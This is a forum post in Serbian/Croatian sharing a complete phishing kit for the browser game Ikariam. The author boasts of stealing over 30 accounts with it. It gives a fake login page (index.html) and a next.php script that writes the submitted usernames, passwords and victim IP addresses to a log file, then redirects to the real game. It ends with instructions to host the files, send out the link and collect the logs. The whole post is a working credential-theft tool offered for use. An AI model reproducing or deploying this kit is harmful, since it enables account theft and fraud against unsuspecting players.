Evo jedam moj phisher koji sam napravio prije oko 1 mjesec...
Riječ je od Ikariam Account Panelu, tj phisheru
Evo pogledajte kako izgleda:Code:
http://www.ikariam-panel.tk/acc.phpSa njim sam upecao preko 30 accova i na kraju su me banovali xD
Kako ga napraviti?!
Ovo sačuvajte kao index.htmlCode:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<body background="http://www.dodaj.rs/f/2V/Np/1Rt8yPkp/background.jpg">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Ulaz-Ikariam Panel</title>
<link href="templates/default/images/favicon.ico" rel="shortcut icon" />
<link href="templates/default/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<!--
Ikariam Account Panel
All rights reserved! Ikariam 2011
-->
<div id="topbg"></div>
<div id="nav">
<div id="page">
<div id="content">
<div id="container"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="title">
<tr>
<td align="left"><h1></h1></td>
</tr>
</table>
<div align="center">
<form action="next.php" method="GET">
<input type="hidden" name="task" value="login" />
<input type="hidden" name="return" value="" />
<table border="0" cellpadding="0" cellspacing="10">
<tr>
<td align="right">Korisnicko ime:</td>
<td><input type="text" name="email" class="text" size="30" value="" /></td>
</tr>
<tr>
<td align="right">Lozinka:</td>
<td><input type="password" name="password" class="text" size="30" value="" /></td>
</tr>
<tr>
<td colspan="2" align="center"><label for="rememberme"><input type="checkbox" name="rememberme" id="rememberme" /> Zapamti moje podatke</label></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" value="Ulaz" class="button" /></td>
</tr>
</table>
</form>
<br />
<a href="login.php?task=password">Zaboravio Lozinku?</a>
</div>
<br /><div align='center'>Sva prava su zadrzana! <a href='http://www.ikariam.com' style='font-weight:bold;' target='_blank'>Ikariam</a></div></div>
</div>
<div id="footer">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td class="left"></td>
<td class="center"></td>
<td class="right"></td>
</tr>
</table>
</div>
</div>
<!--
Ikariam Account Panel
Sva prava zadrzana!
-->
</body>
</html>
A ovo sačuvajte kao next.phpCode:
<?php
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location:
http://rs.ikariam.com ");
$handle = fopen("ikariam_logs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
Sve to ubacite na neki host, šaljite i čekajte logove
Uživajte